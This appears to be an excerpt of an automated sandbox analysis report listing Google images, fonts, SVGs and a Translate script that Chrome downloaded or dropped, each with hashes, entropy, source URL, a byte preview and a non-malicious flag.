                                                                                                                                                                                                                                                            Preview:GIF89a..|........7...N...'..i.Y...M.{2..B.G%..9.......w.......B$...v1.mO...u7".L.R...#.W .s(..1..8.c#.Y .vL.k'....C..D.T!..R.8..B.Y#.......e.....v.3.o.g#..g.5..t.e1.f..J..J.xC).U1..*..h..{.Y.R'.h.@..i..g.......Y..x&....c....s..Y0.F1.......J4.x4.v..r.B....U...z.....G..c;.s%.S9.h1.Y7.g5.Hf]R....U0..{...v7.8...........!..Q.l.R'..........J'....g....I..C..c..Y.i>.(....J1.P.............J..k2...Y5...zU-.J!....t.....R..k......t.....{....9..J.....c.....B..R..Z..s..J..k..Z..s..R..c../..1..1.{)..@..9..P..Z..Z.k)..J.k*.{!.c!..J.c).{!.s ..J..:.c!..K..J.....{..B..R.c)..R..B.k.....?.s*.s/..k..<..K.{......B..9.s!..R....\.k...Z..R.....c.....0..o..l....c..`.....o..A........)................J1..~.......yC7).......R...Z..k{xu..s......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x238, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):206740
                                                                                                                                                                                                                                                            Entropy (8bit):7.707466248278458
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5vmXBGKA:aRNRNRyGFANIIBmRa
                                                                                                                                                                                                                                                            MD5:5E4DA896919076B9A22246C582BBAD90
                                                                                                                                                                                                                                                            SHA1:07FB1482BC6DFBF82A4670C5FE218993F9EF90B8
                                                                                                                                                                                                                                                            SHA-256:9DCECFE50629F6BCF3D29CE39BBE1959F15F2CB93FAC9CD50AF6B48AA87FB6F2
                                                                                                                                                                                                                                                            SHA-512:F88A84AF0A2BAB003DE4E26F54914E4D405954B8CA56D85901145AFBF2F096B6896A189CC8ABC288938245E1FFC5DD87753996C18A797D0266528B446767112C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                                            Entropy (8bit):5.052245007941961
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:qTCJLxoRucN+OjTcvXjXRH0DDmJS4RKb5KVEriqGQcFFuIOUoLRFQcRUlypqURL2:qTCJFou1i3mc4slTHmcIgtbNRLprTY
                                                                                                                                                                                                                                                            MD5:10C8AED69BDAED5FA3120401608F0899
                                                                                                                                                                                                                                                            SHA1:6E5A7025855BFB087B556203D18D24843EBBF804
                                                                                                                                                                                                                                                            SHA-256:6F62D85EF6ED53BC368C77B6A47394A41F3B16D9E07D0B8761E726784EEBCEB4
                                                                                                                                                                                                                                                            SHA-512:E2BAD6E1B1AF68AB4511264A4A8506FFFC4B07936BA3D1C5E809926E7E1741AA0DC1E7991848BD21380F12C962E6C6A7BA74FE82FE24EE762AC736A1DE29B045
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview: <svg id="expand-more" width="18" height="18" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x219, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):219499
                                                                                                                                                                                                                                                            Entropy (8bit):7.733978106983294
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:aRNRNRoD/G3VAW9Zi600000T5Z5+5+5Gz2ZHn5:aRNRNRyGFANII88n5
                                                                                                                                                                                                                                                            MD5:9F82D5F4E4F23186D62A3AF5D1C7FAEB
                                                                                                                                                                                                                                                            SHA1:72C0204695A55C542D6CEFC4D0516D9913780090
                                                                                                                                                                                                                                                            SHA-256:7A01925FA285A40782F559448140282106322303C2A262F939E563BF7B4E49B1
                                                                                                                                                                                                                                                            SHA-512:3D093AB96C737EDAE22EDAF4CD70F097D3DEEE6483FF1DD1A92018D92FD9938E7288A6B59C15BDB03030810FFF213764A4387443BF9DCB1CAC0ED75A07996476
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/e7gO_KgBDTqqeWioKwa3ZWaK155IbBsnaB0n89ZTR4RBmvRPnOhBXOKOi_nBeT3OvcVxRXHcoFTY6g2i_ONX3uvB2SjFIM80LewujfCV=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa......ICC_PROFILE......XKCMS....mntrRGB Lab .........2..acspMSFT....KODAsRGB........................KODA................................................A2B0...D...4bXYZ...x....bTRC.......B2A0......jcprt.......Gdmnd...L...wdmdd.......[gXYZ... ....gTRC.......lumi...4....wtpt...H....desc...\...zrXYZ........rTRC.......vued.......Fview...4...$mft2.....................................................g.......6.....Q.......O.(...........-.W.......k.....I.......\ .!.#.$X%.&.(.)A*x+.,.../I0{1.2.4.576d7.8.9.;.<6=^>.?.@.A.C.D:E\F}G.H.I.J.L.M5NQOmP.Q.R.S.T.V.W.X3YIZ_[t\.].^._.`.a.b.d.e.f'g6hEiSj`knlzm.n.o.p.q.r.s.t.u.v.w.x.y.z.|.}.~..........!.$.'.).*.,.-.........-.,.*.).&.$.!..........................................w.l.a.V.K.?.3.'.....................p.a.Q.@.0................~.k.X.D.1..............v.`.J.4.............{.c.J.2............h.M.3...........v.Z.>."...........u.X.:.........g.......6.....Q.......O.(
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6986
                                                                                                                                                                                                                                                            Entropy (8bit):7.964253357716648
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:y0e4OAPRNbgnMaFkXJv8gX5o0TqEGki5O5l5I:9e4OAPgnMakZv86o0mEGkPT5I
                                                                                                                                                                                                                                                            MD5:DD13DCDAA7EBB9C9E6A1A9FE0972CD9F
                                                                                                                                                                                                                                                            SHA1:3D25C1CAC68EFE2F33C29E0A0813E653B55D8F2C
                                                                                                                                                                                                                                                            SHA-256:55FBD109C32EF241D7167E1CA40A073639142165A23618125A707833BE7F4B7E
                                                                                                                                                                                                                                                            SHA-512:D47FAF554BC2E10C1EA6B1610D2E40A93E30CBDEB8D598C0156329BA6EBE89EC1B87D90F61DBB949E39B380E252BB6CE3937E3B254F71D78E5BF4C1D0C21F1C5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/62/96/faa77b17410f99baebece6f67f9e/google-play-badge.webp
                                                                                                                                                                                                                                                            Preview:RIFFB...WEBPVP8X........y.....ALPH.........!I......3..[+;k.3.F.o`.3.~..+.m;[V........DL..=....>......YS...}.m.E?.w...VD.H(,}(.F.......P|..F.w...F@.v...z....r.+....<[-.5...g......-6Z.J.....D.C.1v.\X...g...v+..bLD.g..W..d.k.UU&E.X.o.3(.`.J..<D.=:+.~.n>l.hVp.5.9..o......1..Y....pn...L.....?.......c......?.......c......?....}...w.?..3K}.]..J.qz.F5....p#...%.....!....R.Q..\8.6W..$.`.Z.c *?B...d..K..W.jD..@3.H."....s.~.}.1..<...P........`..#....x.......-W..a.(....V../....../.....o..(\S...>.>..o.}.U+(j.....(z.!.....VP8 (........*z...>m4.G.#"!%.....gn.q..Qa.o..l@...1..h.?./..w../.U..M...{............>..`.............#.7.....;F..<.}..o?\~..L..?....'..k....~.x.._.....".........O./.~_j....o.\&`..o..?.{.|..oD~....0.+.?..D....}q.-.-.......~......L.#.2.C7......._ PI........._ PD}hH..;...zFK/~R....w6...;.{?.................+....b...m.5.....|.'.{...L..."0.....'Y.*1|J..-.<.CQ.=.b@+.r.N.).s..5M.,..Xn...m0......F`.r.YV...}-u....N..........<B..l....8Y..X.R.!...v
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 748 x 340
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):988581
                                                                                                                                                                                                                                                            Entropy (8bit):7.951315128731031
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:g3le66J3Y3Vl8vrqbwOqA61n/lDtzktnkNcH9Jg:g3aBCmrqbYl4kNo9q
                                                                                                                                                                                                                                                            MD5:B1F180994C218A5502775661978104B0
                                                                                                                                                                                                                                                            SHA1:207833EAB66B6D34B5626FCE4338A870B691E1F4
                                                                                                                                                                                                                                                            SHA-256:0E37829AF2ED566CA2147A5514D499039BE876C42BE30A4BB5527E867CD5428A
                                                                                                                                                                                                                                                            SHA-512:5C82A20A6AD03355B45D34C05960D2878283B4423BC3498FB62963766970ECBA9AEFB4DCBA5448618C444FC37A0CAB1452F7E217896C1C016E38654359093BB8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2023/sapardi-djoko-damonos-83rd-birthday-6753651837110031-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a..T....s..R.c...e.mKsi...k{cZR8k...ljZ{..kjlx...z..s......j........qlX...s..oR2.kL........t........d.....2).dZD...d..............Z.nMLG{....ex..JxZ.yT...J<$........m.......Y...n........v....j...s..{......z...?CD..\...~c...V\dsbC.aG...BB6.}y...R.Z.....s.......99;k.....^?......s........}..}..{.......................D;;......~..s..................k..........cc...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:DEC8955DBA2E11EDA83BEBBA0CD46A92" xmpMM:InstanceID="xmp.iid:DEC8955CBA2E11EDA83BEBBA0CD46A92" xmp:CreatorTool="Adobe Photoshop 2023 M
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x334, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):31818
                                                                                                                                                                                                                                                            Entropy (8bit):7.9609427223282285
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:qQterzZDiS6tRItoafNn9VSsYxSbOxFzc67NDA2:3tIbbrJbOTzp7NDA2
                                                                                                                                                                                                                                                            MD5:1D97CD0EB53D512E7F8C03D83B477830
                                                                                                                                                                                                                                                            SHA1:42F135E43562638E86D2B6725B5B6374855375BF
                                                                                                                                                                                                                                                            SHA-256:82E4C38B340747CB6AC53C3EEECA6E1CF275B2E0E447F42526A7F5CEC833C132
                                                                                                                                                                                                                                                            SHA-512:8898F9DD81EFFC3102A3169B677AE794FB23AFC5ED215BC20465B5C3A44CDD17ABADC9E1ACFD482D0524C8A489171CF29503FFEB359F4D17A71264269E366FBC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/sarNvJGsElTyskguj3eBs8jWOiO3GZzu0FTOotLbaVX4D9Wt17OLO7MRdFiedqYyzjL44Hl8y3WzgOmMOCarw9poy4C1m1f8Sb9jgtULLDgpyeM9dnY=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................N....".........................................P.........................!1.AQ.."aq.2....BR.#b......3r..$CS.........4.c...DTd..................................1........................!.1.."AQ.aq2..BR...#..$............?..b....l'..l+Z..<.`...3[V....hP.@.....(P.@.....(P..O..|..y..f....)p.2&..`u......,YK..%.......2&.....X...9..U..q?n<)..)..D..6.A..+P..@..2..&..{t6.....R|(i..I..Y^..<j.i.w....5y....,....x.9..s%.A$..R...e...H)mm....L.$k.AY.j..c.4..4*..k...Ke7....*...A....f..?.m...Z\B..hPRT:.'B<..H5.k....hP...(P.@.....(P.@.....(P.@.....+".B.2k.(P..B....(P..B....P....(.z..k3@....hP.&.jhR0..P.M.`k4R...D.[MiY..6.(P4.......i.5.......(P.*.2)....B.ya.$jI...... .n3c..~..YY.l..=.e.JF.J:....j>....:.`.E.J.C.*...9U..U....>..u.-V.{.!3...J...'R5.H.5.w.A.....'...e'.....\.}.C...Z.P.T........qUz..C....I&?W..:....l.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 422
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):430232
                                                                                                                                                                                                                                                            Entropy (8bit):7.961079602432547
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:5JPXGhHrMfCJ2iMoRv4DeyoPPPR11JmB0yjHHtHAT29zpq:3XGoff4RQyFB1miyzNHU2BI
                                                                                                                                                                                                                                                            MD5:75F6E09B34840B023663BD47C42C29B7
                                                                                                                                                                                                                                                            SHA1:B909AEF7D737B26C536490D8B17C8B4D0FC0C467
                                                                                                                                                                                                                                                            SHA-256:BA5CC7F4614DC6D43B902D4661560B8408A527AAF45897E8C2AF18A45AA8C1F5
                                                                                                                                                                                                                                                            SHA-512:D84EEC1F932D6E1D306C9D55D439673A1CB60A09F0C440CFC5C5DFB2B0BFE670440DA7E2DAB38A939429A945D23DA6DF9EE12D4380D1EBDEA23BE586DD3E83D9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a..........Wb..Z.I(4......(."...Zk9...........7.......W..e.Z..C.Y.Z.}....j....{....{...........7.I:......p..#....J.......E..=..../....U..lck....&....G..g......j......]66......w<..M..w.I.................e.kJ.........?.......w.:.........g..f..v...........c..g.......w......c........V....Y..W..y.........h.~....Q....Z.......xex.pV`....v..........h\EO..!....._.......u........pL......."..ck...h...g.ZZTf....C..(.....vS.V..*.4.cJ....<[c{..............V....J..Ul....O..H.......z......JE@............>{...C...........&.......v\..nv.............tu..as....k.........D?3..cs.............k...........!..........Z...|....a..............msz......l..3.......................F........)..k..fs....................!..NETSCAPE2.0.....!.......,............W..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x..........L.....+^....#K.L....3k.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1665)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):212211
                                                                                                                                                                                                                                                            Entropy (8bit):5.580396046181856
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:Imm/7rzuNxN0V5qYmIhE3CUJISG2EOy0+f25kx4:I1HmDRJSmweJ
                                                                                                                                                                                                                                                            MD5:716E437C0AF4113D369C6F26F17735E8
                                                                                                                                                                                                                                                            SHA1:A8440D614BDED168B96E8420FAAFBB3E735067E5
                                                                                                                                                                                                                                                            SHA-256:F9AB6A8D7232400C98766C1CCF3632C44DD9B4532A918D4A193B5C2B3DB23530
                                                                                                                                                                                                                                                            SHA-512:8328F5B4528B2DADBFDBE7F7A9F48752488C713264CE63ABF308F2DAB0647A9567C9E1BC50C8BF493428390D3B42C16E7CA898C8AE79B02DC61C625FC6986876
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://translate.googleapis.com/_/translate_http/_/js/k=translate_http.tr.en_US.IljmfDNQ2Zs.O/d=1/exm=el_conf/ed=1/rs=AN8SPfouuliwX6zvl3Sz97jL8YIEPnJUrg/m=el_main
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_tr=this.default_tr||{};(function(_){var window=this;.try{._.Qg=function(a){return _.Da?_.Ea?_.Ea.brands.some(function(b){return(b=b.brand)&&-1!=b.indexOf(a)}):!1:!1};_.Rg=function(){return _.Fa()?_.Qg("Microsoft Edge"):_.u("Edg/")};_.Sg=function(){return _.u("Firefox")||_.u("FxiOS")};_.Tg=function(){return _.Fa()?_.Qg("Chromium"):(_.u("Chrome")||_.u("CriOS"))&&!_.Ia()||_.u("Silk")};_.Ug=function(){return _.u("Safari")&&!(_.Tg()||(_.Fa()?0:_.u("Coast"))||_.Ga()||_.Ia()||_.Rg()||(_.Fa()?_.Qg("Opera"):_.u("OPR"))||_.Sg()||_.u("Silk")||_.u("Android"))};._.Vg=function(){return _.u("Android")&&!(_.Tg()||_.Sg()||_.Ga()||_.u("Silk"))};_.Xg=function(a,b){_.Wg?a[_.Wg]=b:void 0!==a.h?a.h=b:Object.defineProperties(a,{h:{value:b,configurable:!0,writable:!0,enumerable:!1}});return a};_.Yg=_.Sg();_.Zg=_.La()||_.u("iPod");_.$g=_.u("iPad");_.ah=_.Vg();_.bh=_.Tg();_.ch=_.Ug()&&!_.Ma();_.dh="undefined"!==typeof Uint8Array;_.eh=!_.C&&"function"===typeof _.r.btoa;_.Wg="function"==
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1660
                                                                                                                                                                                                                                                            Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                            MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                            SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                            SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                            SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 68x68, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):3059
                                                                                                                                                                                                                                                            Entropy (8bit):7.8035944355387254
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:UrX6hyoEPhndSeEKulTRuWyXTfw05THTTjWX+E9986uZ7yYPKdym4vSw9C10FUSS:yKhyhnIHankWzO+E9+5B3K76SgCeUSIb
                                                                                                                                                                                                                                                            MD5:35B477666B9EF9F48CF21C3CC4DDBDB5
                                                                                                                                                                                                                                                            SHA1:177913E1E6988AC0060DF81A9A78B7AEBAAD999E
                                                                                                                                                                                                                                                            SHA-256:3FD7CFE40301BB21BFB30BBD367F4FE48257601979566DA809826373058DEA8B
                                                                                                                                                                                                                                                            SHA-512:A7B92C786507B1069A9F8D48F66CDDFCC29F7E0F769B3CA745BA7F53A6554DE3F9C08C93BBD5D0FAE16B302ADC8CBBD2709F0E671A2D3285EAD046262F0F3910
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://yt3.ggpht.com/ytc/AL5GRJUNolsa3j03QZxx3egj_yEP6gNK4lzbFRCUgdoi6SM=s68-c-k-c0x00ffffff-no-rj
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Google..............................................................................................................................................D.D...........................................8............................!1.AQ."..#2Vaq...$BRbr.....................................?........................!1.AQa..q..."2BRS.........#3b.....Ts.............?...#......2...ueR*..3...b.<...Y...;,..B.KM.%X.i.E!o.Z..|...!Q..<w...6..i..lw.Hc.e..t=....k..2+..P..F.#.....L......16..rI=...=.>.e......i..u.......\..?B..W.V;.Y.V/bV5S..N..%..{_-...=.?...kg.s'1.$[..3..V.m.....3...s3..%...M#;......[....E...b.#.)..y....N:h".gWN......mk.g5..#.d.,c ..`8....n".~.2.....s............H.6.Bo..*e.7..r..vj...h.&.W.^O...V.x..r...>..x.7......R.I...+.....d.fzv,..w:..|.k.[.slF..g.r...l`..2@.>..l.m..................F.%;....:H....S......]1#..W....Q~.$..>3.De4..m....A..V.E9..a1I+..sr..>..F@dlIvE..../..i.:.fi%u.8.]...*.R~.. ...Z......L.X
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 7764, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):7764
                                                                                                                                                                                                                                                            Entropy (8bit):7.969910156375325
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:Rogh0XwQxY5egCC3qiDcvgs8b4/gO59lcva3f:RokWAEgoiSs5OHlcO
                                                                                                                                                                                                                                                            MD5:840275CCD07904AE4081556FD92B784F
                                                                                                                                                                                                                                                            SHA1:3599B52C76D614FF957CEE2606AC67D61E8F50A8
                                                                                                                                                                                                                                                            SHA-256:4053825BF798F2D0CAF91D40483D4447ECEADEE819DB6AC1C7DC498B9AD41F49
                                                                                                                                                                                                                                                            SHA-512:35F1C373B70483860B7B6137C645974B5AC3FAB9C9A824CCF0B98687873BA80C8ADDF45FA35E06D8D1AB9BCFBBE7CF0E9EB26BC0C1ED4B22AB7A1BA2AD03288B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmxjtiu7.woff2
                                                                                                                                                                                                                                                            Preview:wOF2.......T......J...............................0..x..n.`.......8....P..6.$.... .....)...b@e........3#.V..E.eg.......c;.Y....<..m..0k.L.....%aE...S8.T.....Swrt.".h....e.X.....2...]......>.....tF<..MN.............bV......W..@B..i..m.;1n!.....J.d.."`.Fb31..\..,.[...d.....".x...3..1..@"*...'8.'.9.v..r9.WB....Z..[.S.7 R.h....B.......j.|YM..-..."..._.p...=.,>.i.9.l...\_>*?t..I.d.9Q..3k/.|X;1...S......J,...R......@....6.vFc.Y..N!..TQQ1..5.h.vF.........HG...>..D.p'..p..U..U..\..RT).".=....^...q....@.....l...j....t!..O..k.{y....5..3....l....56.YH..`...%q...#....BC..S.BW."".QQ.hiA...3........Q.....4..4.......A-.DD@.,.l....n.C..@0..6.....C...*..}(.b..F..$.`.9....a .L.u.q.K.q...(T|.....4."....0hrq..v.8J.R.v..lW.[P<.>..e...*C......Mqyr...N..]..p.Q=.p!xe........V.-.Q^..<W,.....f-r...%j..J..lX^.^PQ.w.A.H5<.fV.&.$OL)1A6. .....Ss...|2.FU.O.CUq.*(.......^...B..&5..2..T.F7".BN..pBSQ.8~p.q..x{a.Q.M......;8$..d..%..).".3.s...`........TKgrd.]..._..g...^dB.......Z.6..?..Q>
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 711 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):45350
                                                                                                                                                                                                                                                            Entropy (8bit):7.933007816308371
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:wnJOknm+NJKmGhglD8qRsKKsEKzXShEZcMyn87kWLhFbLo6ATRBxCGkBeyT28jkY:SZnm+NJBPH2sxShzMK2FPE67+HXat
                                                                                                                                                                                                                                                            MD5:F32E6271C6C5603E4BB9049FA298D945
                                                                                                                                                                                                                                                            SHA1:2C16488B186E9D20A1E737F9A1449CC3B68EC43F
                                                                                                                                                                                                                                                            SHA-256:52C102B7949F96C195A6AECEF5C8ED25677B6737B9ED6985E6428DBF79521626
                                                                                                                                                                                                                                                            SHA-512:D9C155AF6F18CB999CF079C19E6FE6DB41AABCE2EC9C260EE0DD220458F15E406FA2388069A177388BCAFF21A26FF4E70326C932456290B4B55E5318BFC1274C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
